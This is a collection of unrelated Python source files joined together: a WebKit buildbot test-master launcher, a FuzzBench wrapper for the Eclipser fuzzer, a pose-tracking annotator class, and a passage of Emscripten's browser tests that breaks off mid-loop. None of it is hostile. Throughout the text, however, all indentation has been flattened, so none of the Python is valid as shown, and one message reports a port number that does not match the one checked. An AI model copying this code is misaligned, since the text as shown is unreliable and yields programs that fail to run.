# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import signal
import os
import argparse
import subprocess
import tempfile
import shutil
import socket
import json
import traceback
import multiprocessing
from time import sleep
test_buildbot_master_tac = """
import os
from twisted.application import service
try:
from buildbot.master.bot import BuildMaster
except:
from buildbot.master import BuildMaster
basedir = os.path.dirname(os.path.realpath(__file__))
configfile = r'master.cfg'
application = service.Application('buildmaster')
BuildMaster(basedir, configfile).setServiceParent(application)
"""
worker_buildbot_master_tac = """
import os
from twisted.application import service
from buildslave.bot import BuildSlave
basedir = os.path.dirname(os.path.realpath(__file__))
buildmaster_host = 'localhost'
port = 17000
slavename = '%(worker)s'
passwd = '1234'
keepalive = 600
usepty = 1
application = service.Application('buildslave')
BuildSlave(buildmaster_host, port, slavename, passwd, basedir, keepalive, usepty).setServiceParent(application)
"""
def check_tcp_port_open(address, port):
s = socket.socket()
try:
s.connect((address, port))
return True
except:
return False
def upgrade_db_needed(log):
try:
with open(log) as f:
for l in f:
if 'upgrade the database' in l:
return True
except:
return False
return False
def create_tempdir(tmpdir=None):
if tmpdir is not None:
if not os.path.isdir(tmpdir):
raise ValueError('%s is not a directory' % tmpdir)
return tempfile.mkdtemp(prefix=os.path.join(os.path.abspath(tmpdir), 'tmp'))
return tempfile.mkdtemp()
def print_if_error_stdout_stderr(cmd, retcode, stdout=None, stderr=None, extramsg=None):
if retcode != 0:
if type(cmd) == type([]):
cmd = ' '.join(cmd)
print('WARNING: "%s" returned %s status code' % (cmd, retcode))
if stdout is not None:
print(stdout)
if stderr is not None:
print(stderr)
if extramsg is not None:
print(extramsg)
def setup_master_workdir(configdir, base_workdir):
master_workdir = os.path.join(base_workdir, 'master')
print('Copying files from %s to %s ...' % (configdir, master_workdir))
shutil.copytree(configdir, master_workdir)
print('Generating buildbot files at %s ...' % master_workdir)
with open(os.path.join(master_workdir, 'buildbot.tac'), 'w') as f:
f.write(test_buildbot_master_tac)
mkpwd_cmd = ['./make_passwords_json.py']
mkpwd_process = subprocess.Popen(mkpwd_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = mkpwd_process.communicate()
print_if_error_stdout_stderr(mkpwd_cmd, mkpwd_process.returncode, stdout, stderr)
return master_workdir
def wait_for_master_ready(master_workdir):
master_ready_check_counter = 0
while True:
if os.path.isfile(os.path.join(master_workdir, '.master-is-ready')):
return
if master_ready_check_counter > 60:
raise RuntimeError('ERROR: Aborting after waiting 60 seconds for the master to start.')
sleep(1)
master_ready_check_counter += 1
def start_master(master_workdir):
# This is started via multiprocessing. We set a new process group here
# to be able to reliably kill this subprocess and all of its child on clean.
os.setsid()
buildmasterlog = os.path.join(master_workdir, 'buildmaster.log')
dbupgraded = False
retry = True
if check_tcp_port_open('localhost', 8710):
print('ERROR: There is some process already listening in port 8170')
return 1
while retry:
retry = False
print('Starting the twistd process ...')
twistd_cmd = ['twistd', '-l', buildmasterlog, '-noy', 'buildbot.tac']
twistd_process = subprocess.Popen(twistd_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while twistd_process.poll() is None:
if check_tcp_port_open('localhost', 8710):
print('Test buildmaster ready!.\n\n'
+ ' - See buildmaster log:\n'
+ ' tail -f %s\n' % buildmasterlog
+ ' - Open a browser to:\n'
+ ' http://localhost:8710\n'
+ ' - Credentials for triggering manual builds:\n'
+ ' login: committer@webkit.org\n'
+ ' password: committerpassword\n')
with open(os.path.join(master_workdir, '.master-is-ready'), 'w') as f:
f.write('ready')
twistd_process.wait()
return 0
sleep(1)
stdout, stderr = twistd_process.communicate()
if twistd_process.returncode == 0 and upgrade_db_needed(buildmasterlog) and not dbupgraded:
retry = True
dbupgraded = True
print('Upgrading the database ...')
upgrade_cmd = ['buildbot', 'upgrade-master', master_workdir]
upgrade_process = subprocess.Popen(upgrade_cmd, cwd=master_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = upgrade_process.communicate()
print_if_error_stdout_stderr(upgrade_cmd, upgrade_process.returncode, stdout, stderr)
else:
print_if_error_stdout_stderr(twistd_cmd, twistd_process.returncode, stdout, stderr,
'Check the log at %s' % buildmasterlog)
return 0
def get_list_workers(master_workdir):
password_list = os.path.join(master_workdir, 'passwords.json')
with open(password_list) as f:
passwords = json.load(f)
list_workers = []
for worker in passwords.keys():
list_workers.append(str(worker))
return list_workers
def start_worker(base_workdir, worker):
# This is started via multiprocessing. We set a new process group here
# to be able to reliably kill this subprocess and all of its child on clean.
os.setsid()
worker_workdir = os.path.join(base_workdir, worker)
os.mkdir(worker_workdir)
with open(os.path.join(worker_workdir, 'buildbot.tac'), 'w') as f:
f.write(worker_buildbot_master_tac % {'worker': worker})
twistd_cmd = ['twistd', '-l', 'worker.log', '-noy', 'buildbot.tac']
twistd_worker_process = subprocess.Popen(twistd_cmd, cwd=worker_workdir,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
stdout, stderr = twistd_worker_process.communicate()
except:
twistd_worker_process.kill()
return
print_if_error_stdout_stderr(twistd_cmd, twistd_worker_process.returncode, stdout, stderr,
'Check the log at %s' % os.path.join(worker_workdir, 'worker.log'))
def clean(temp_dir):
if os.path.isdir(temp_dir):
print('\n\nCleaning %s ... \n' % (temp_dir))
# shutil.rmtree can fail if we hold an open file descriptor on temp_dir
# (which is very likely when cleaning) or if temp_dir is a NFS mount.
# Use rm instead that always works.
rm = subprocess.Popen(['rm', '-fr', temp_dir])
rm.wait()
def cmd_exists(cmd):
return any(os.access(os.path.join(path, cmd), os.X_OK)
for path in os.environ['PATH'].split(os.pathsep))
def check_buildbot_installed():
if cmd_exists('twistd') and cmd_exists('buildbot'):
return
raise RuntimeError('Buildbot is not installed.')
def setup_virtualenv(base_workdir_temp):
if cmd_exists('virtualenv'):
print('Setting up virtualenv at %s ... ' % base_workdir_temp)
virtualenv_cmd = ['virtualenv', '-p', 'python2', 'venv']
virtualenv_process = subprocess.Popen(virtualenv_cmd, cwd=base_workdir_temp,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = virtualenv_process.communicate()
print_if_error_stdout_stderr(virtualenv_cmd, virtualenv_process.returncode, stdout, stderr)
virtualenv_bindir = os.path.join(base_workdir_temp, 'venv', 'bin')
virtualenv_pip = os.path.join(virtualenv_bindir, 'pip')
if not os.access(virtualenv_pip, os.X_OK):
print('Something went wrong setting up virtualenv'
'Trying to continue using the system version of buildbot')
return
print('Setting up buildbot dependencies on the virtualenv ... ')
# The idea is to install the very same version of buildbot and its
# dependencies than the ones used for running https://build.webkit.org/about
pip_cmd = [virtualenv_pip, 'install',
'buildbot==0.8.6p1',
'buildbot-slave==0.8.6p1',
'twisted==12.1.0',
'jinja2==2.6',
'sqlalchemy==0.7.8',
'sqlalchemy-migrate==0.12.0']
pip_process = subprocess.Popen(pip_cmd, cwd=base_workdir_temp,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = pip_process.communicate()
print_if_error_stdout_stderr(pip_cmd, pip_process.returncode, stdout, stderr)
os.environ['PATH'] = virtualenv_bindir + ':' + os.environ['PATH']
return
print('WARNING: virtualenv not installed. '
'Trying to continue using the system version of buildbot')
def configdir_is_valid(configdir):
return(os.path.isdir(configdir) and
os.path.isfile(os.path.join(configdir, 'config.json')) and
os.path.isfile(os.path.join(configdir, 'master.cfg')) and
os.access(os.path.join(configdir, 'make_passwords_json.py'), os.X_OK))
def main(configdir, basetempdir=None, no_clean=False, no_workers=False, use_system_version=False):
configdir = os.path.abspath(os.path.realpath(configdir))
if not configdir_is_valid(configdir):
raise ValueError('The configdir %s dont contains the buildmaster files expected by this script' % configdir)
base_workdir_temp = os.path.abspath(os.path.realpath(create_tempdir(basetempdir)))
if base_workdir_temp.startswith(configdir):
raise ValueError('The temporal working directory %s cant be located inside configdir %s' % (base_workdir_temp, configdir))
try:
if not use_system_version:
setup_virtualenv(base_workdir_temp)
check_buildbot_installed()
master_workdir = setup_master_workdir(configdir, base_workdir_temp)
master_runner = multiprocessing.Process(target=start_master, args=(master_workdir,))
master_runner.start()
wait_for_master_ready(master_workdir)
if no_workers:
print(' - To manually attach a build worker use this info:\n'
+ ' TCP port for the worker-to-master connection: 17000\n'
+ ' worker-id: the one defined at %s\n' % os.path.join(master_workdir, 'passwords.json')
+ ' password: 1234\n')
else:
worker_runners = []
for worker in get_list_workers(master_workdir):
worker_runner = multiprocessing.Process(target=start_worker, args=(base_workdir_temp, worker,))
worker_runner.start()
worker_runners.append(worker_runner)
print(' - Workers started!.\n'
+ ' Check the log for each one at %s/${worker-name-id}/worker.log\n' % base_workdir_temp
+ ' tail -f %s/*/worker.log\n' % base_workdir_temp)
for worker_runner in worker_runners:
worker_runner.join()
master_runner.join()
except:
traceback.print_exc()
finally:
try:
# The children may exit between the check and the kill call.
# Ignore any exception raised here.
for c in multiprocessing.active_children():
# Send the signal to the whole process group.
# Otherwise some twistd sub-childs can remain alive.
os.killpg(os.getpgid(c.pid), signal.SIGKILL)
except:
pass
if not no_clean:
clean(base_workdir_temp)
sys.exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--config-dir', help='Path to the directory of the build master config files. '
'Defauls to the directory where this script is located.',
dest='configdir', type=str,
default=os.path.dirname(__file__))
parser.add_argument('--base-temp-dir', help='Path where the temporal working directory will be created. '
'Note: To trigger test builds with the test workers you need enough free space on that path.',
dest='basetempdir', default=None, type=str)
parser.add_argument('--no-clean', help='Do not clean the temporal working dir on exit.',
dest='no_clean', action='store_true')
parser.add_argument('--no-workers', help='Do not start the test workers.',
dest='no_workers', action='store_true')
parser.add_argument('--use-system-version', help='Instead of setting up a virtualenv with the buildbot version '
'used by build.webkit.org, use the buildbot version installed on this system.',
dest='use_system_version', action='store_true')
args = parser.parse_args()
main(args.configdir, args.basetempdir, args.no_clean, args.no_workers, args.use_system_version)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for Eclipser fuzzer. Note that starting from v2.0, Eclipser
relies on AFL to perform random-based fuzzing."""
import subprocess
import os
import threading
from fuzzers import utils
from fuzzers.afl import fuzzer as afl_fuzzer
from fuzzers.afl_qemu import fuzzer as afl_fuzzer_qemu
def get_eclipser_outdir(target_directory):
"""Return path to eclipser target directory."""
return os.path.join(target_directory, 'eclipser_benchmark')
def build():
"""Build benchmark."""
# Backup the environment.
new_env = os.environ.copy()
# Build afl with qemu (shared build code afl/afl++)
afl_fuzzer_qemu.build()
# Next, build a binary for Eclipser.
src = os.getenv('SRC')
work = os.getenv('WORK')
eclipser_outdir = get_eclipser_outdir(os.environ['OUT'])
os.mkdir(eclipser_outdir)
new_env['CC'] = 'clang'
new_env['CXX'] = 'clang++'
new_env['CFLAGS'] = ' '.join(utils.NO_SANITIZER_COMPAT_CFLAGS)
cxxflags = [utils.LIBCPLUSPLUS_FLAG] + utils.NO_SANITIZER_COMPAT_CFLAGS
new_env['CXXFLAGS'] = ' '.join(cxxflags)
new_env['OUT'] = eclipser_outdir
new_env['FUZZER_LIB'] = '/libStandaloneFuzzTarget.a'
new_env['FUZZ_TARGET'] = os.path.join(
eclipser_outdir, os.path.basename(os.getenv('FUZZ_TARGET')))
print('[build] Re-building benchmark for eclipser fuzzing target.')
with utils.restore_directory(src), utils.restore_directory(work):
utils.build_benchmark(env=new_env)
def eclipser(input_corpus, output_corpus, target_binary):
"""Run Eclipser."""
# We will use output_corpus as a directory where AFL and Eclipser sync their
# test cases with each other. For Eclipser, we should explicitly specify an
# output directory under this sync directory.
eclipser_out = os.path.join(output_corpus, "eclipser_output")
command = [
'dotnet',
'/Eclipser/build/Eclipser.dll',
'-p',
target_binary,
'-s',
output_corpus,
'-o',
eclipser_out,
'--arg', # Specifies the command-line of the program.
'foo',
'-f', # Specifies the path of file input to fuzz.
'foo',
'-v', # Controls the verbosity.
'2',
'--exectimeout',
'5000',
]
if os.listdir(input_corpus): # Specify inputs only if any seed exists.
command += ['-i', input_corpus]
print('[eclipser] Run Eclipser with command: ' + ' '.join(command))
subprocess.Popen(command)
def afl_worker(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker')
afl_fuzzer.run_afl_fuzz(input_corpus, output_corpus, target_binary,
['-Q', '-S', 'afl-worker'], True)
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
# Calculate eclipser binary path from the afl target binary.
target_binary_directory = os.path.dirname(target_binary)
eclipser_target_binary_directory = (
get_eclipser_outdir(target_binary_directory))
target_binary_name = os.path.basename(target_binary)
eclipser_target_binary = os.path.join(eclipser_target_binary_directory,
target_binary_name)
afl_fuzzer.prepare_fuzz_environment(input_corpus)
afl_args = (input_corpus, output_corpus, target_binary)
eclipser_args = (input_corpus, output_corpus, eclipser_target_binary)
# Do not launch AFL master instance for now, to reduce memory usage and
# align with the vanilla AFL.
print('[fuzz] Running AFL worker')
afl_worker_thread = threading.Thread(target=afl_worker, args=afl_args)
afl_worker_thread.start()
print('[fuzz] Running Eclipser')
eclipser_thread = threading.Thread(target=eclipser, args=eclipser_args)
eclipser_thread.start()
print('[fuzz] Now waiting for threads to finish...')
afl_worker_thread.join()
eclipser_thread.join()
|
interface.py
|
import copy
import json
import threading
import time
import numpy as np
from src.system.identity_tracker import IdentityTracker
from src.system.model_factory import ModelFactory
from src.utils.pose import PoseConfig, Pose2D, Pose3D
class AnnotatorInterface:
EXTRA_OBJECT_DETECTION_DELAY = 0.50
def __init__(self, bbox_model, pose_2d_model, pose_3d_model, max_persons):
self.bbox_model = bbox_model
self.pose_2d_model = pose_2d_model
self.pose_3d_model = pose_3d_model
self.persons = {}
self.last_image = None
self.persons_lock = threading.Lock()
self.available_person_id = set(range(max_persons))
self.last_object_detector_timestamp = 0
# kill threaded object detector routine
self.object_detector_kill_trigger = False
self.person_hash_provider = 0
threading.Thread(target=self.person_identification_routine).start()
"""
Build the annotator interface using the model defined in the model factory
"""
@staticmethod
def build(max_persons=1):
bbox_model = ModelFactory.build_object_detection_interface()
pose_2d_model = ModelFactory.build_pose_2d_interface()
pose_3d_model = ModelFactory.build_pose_3d_interface()
return AnnotatorInterface(bbox_model, pose_2d_model, pose_3d_model, max_persons)
"""
Create a new person annotation
"""
def _new_person(self, person_id):
self.person_hash_provider = (self.person_hash_provider +1)%1000000
return {
'id': person_id,
'bbox':None,
'pose_2d':None,
'pose_3d':None,
'confidence':np.array([0.25 for _ in range(PoseConfig.get_total_joints())]),
'hash':self.person_hash_provider
}
"""
Background routine started in a thread in the init method
used to manage incoming and outgoing people
"""
def person_identification_routine(self):
while not self.object_detector_kill_trigger:
time.sleep(0.10)
pid_to_remove, detected_boxes_to_add = set(), set()
with self.persons_lock:
curr_persons = [p for p in copy.deepcopy(self.persons).values() if p['pose_2d'] is not None]
# filter pose with a too low confidence [pid_to_remove]
for pid in range(len(curr_persons)):
# score person confidence using most easily recognizable joints
person_confidence = 5*curr_persons[pid]['confidence'][PoseConfig.HEAD]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_SHOULDER]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_SHOULDER]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_HIP]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_HIP]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_KNEE]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_KNEE]
person_confidence /= 11
# if confidence is too low : remove the person from the annotator
if person_confidence < 0.25:
pid_to_remove.add(curr_persons[pid]['id'])
# remove person sharing the same location in the screen
# (avoid detecting twice the same person when tricky situation happens)
for other_pid in range(pid+1, len(curr_persons)):
bbox1 = curr_persons[pid]['bbox']
bbox2 = curr_persons[other_pid]['bbox']
bbox_inter = bbox1.intersect(bbox2)
# is intersection empty
if bbox_inter is None:
continue
ratio1 = bbox_inter.get_width() * bbox_inter.get_height()
ratio1 /= bbox1.get_width() * bbox1.get_height()
ratio2 = bbox_inter.get_width() * bbox_inter.get_height()
ratio2 /= bbox2.get_width() * bbox2.get_height()
ratio = max(ratio1, ratio2)
# modified IoU > 0.85 => remove other_pid
if ratio > 0.85:
pid_to_remove.add(curr_persons[other_pid]['id'])
# update the local version of persons
curr_persons = [curr_persons[pid] for pid in range(len(curr_persons)) if curr_persons[pid]['id'] not in pid_to_remove]
is_requiring_inference = self.last_image is not None
is_requiring_inference = is_requiring_inference and len(self.available_person_id) > 0
tmp = time.time() - self.last_object_detector_timestamp > AnnotatorInterface.EXTRA_OBJECT_DETECTION_DELAY
is_requiring_inference = is_requiring_inference and tmp
# add new incoming people [person_to_add]
if is_requiring_inference:
curr_bboxes = [p['bbox'] for p in curr_persons]
new_bboxes, confidences = self.bbox_model.predict(self.last_image)
# simple matching from old bbox to new :
# return matches, unmachted from arg1, unmatched from arg2
match_ids, unmatched_curr_ids, unmatched_new_ids = IdentityTracker.match_bboxes(curr_bboxes, new_bboxes)
# add the most confident persons as long as an allocation available for it
total_available_allocations = len(pid_to_remove) + len(self.available_person_id)
tmp = [ [new_bboxes[i], confidences[i]] for i in unmatched_new_ids]
tmp.sort(key=lambda x:x[1], reverse=True)
for box in [box_and_conf[0] for box_and_conf in tmp][:total_available_allocations]:
detected_boxes_to_add.add(box)
self.last_object_detector_timestamp = time.time()
with self.persons_lock:
# update removed persons
for pid in pid_to_remove:
del self.persons[pid]
self.available_person_id.add(pid)
for box in detected_boxes_to_add:
p = self._new_person(self.available_person_id.pop())
p['bbox'] = box
self.persons[p['id']] = p
""" Terminates the object detection routine executed in background"""
def terminate(self):
self.object_detector_kill_trigger = True
"""
Return the person's annotations
"""
def get_persons(self):
with self.persons_lock:
persons = copy.deepcopy(self.persons)
return [p for p in persons.values() if p['pose_2d'] is not None]
"""
Update the pose with the given image and return the new annotation
"""
def update(self, image):
if len(image.shape) != 3:
raise Exception("image need to be shaped as hxwx3 or hxwx4 for png")
# remove alpha channel if any
if image.shape[2] == 4:
image = image[:,:,:3]
# if there is at least one person to detect
if len(self.persons) > 0:
# update curr persons annotations in local
with self.persons_lock:
curr_persons = copy.deepcopy(self.persons)
pids, bboxes, poses_2d = [], [], []
for p in curr_persons.values():
pids.append(p['id'])
bboxes.append(p['bbox'])
poses_2d.append(p['pose_2d'])
new_poses_2d, confidences = self.pose_2d_model.predict(image, bboxes, poses_2d)
confidences = np.array(confidences)
new_poses_3d = self.pose_3d_model.predict(new_poses_2d)
for i,pid in enumerate(pids):
curr_persons[pid]['bbox'] = new_poses_2d[i].to_bbox()
curr_persons[pid]['pose_2d'] = new_poses_2d[i]
curr_persons[pid]['pose_3d'] = new_poses_3d[i]
curr_persons[pid]['confidence'] = confidences[i]
# update the annotations in the scope of the class
with self.persons_lock:
for curr_person in curr_persons.values():
# a person['id'] could be removed and a new person could added with the same label
is_same_person = curr_person['id'] in self.persons and self.persons[curr_person['id']]['hash'] == curr_person['hash']
# if possible add a bit of smoothing between predictions
if is_same_person and self.persons[curr_person['id']]['pose_2d'] is not None:
smoothed_joints_2d = 0.85 * curr_person['pose_2d'].get_joints() \
+ 0.15 * self.persons[curr_person['id']]['pose_2d'].get_joints()
# note 2d joints are smoothed twice (todo)
smoothed_joints_3d = 0.85 * curr_person['pose_3d'].get_joints() \
+ 0.15 * self.persons[curr_person['id']]['pose_3d'].get_joints()
smoothed_confidence = 0.85 * curr_person['confidence'] + 0.15 * self.persons[curr_person['id']]['confidence']
curr_person['pose_2d'] = Pose2D(smoothed_joints_2d)
curr_person['pose_3d'] = Pose3D(smoothed_joints_3d)
curr_person['confidence'] = smoothed_confidence
curr_person['bbox'] = curr_person['pose_2d'].to_bbox()
# does not update a people removed in between by the threaded routine
if is_same_person:
self.persons[curr_person['id']] = curr_person
self.last_image = image
return self.get_persons()
"""
Return a json containing the annotations
"""
def jsonify(self):
persons = self.get_persons()
annotations = []
for i in range(len(persons)):
joints2d = persons[i]['pose_2d'].get_joints()
joints3d = persons[i]['pose_3d'].get_joints()
annot = {'id':persons[i]['id'], 'pose_2d': {}, 'pose_3d': {}, 'confidence':persons[i]['confidence'].tolist()}
for i in range(PoseConfig.get_total_joints()):
joint2d = {'x': float(joints2d[i][0]), 'y': float(joints2d[i][1])}
annot['pose_2d'][PoseConfig.NAMES[i]] = joint2d
joint3d = {'x': float(joints3d[i][0]), 'y': float(joints3d[i][1]), 'z': float(joints3d[i][2])}
annot['pose_3d'][PoseConfig.NAMES[i]] = joint3d
annotations.append(annot)
return json.dumps(annotations, ensure_ascii=False)
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
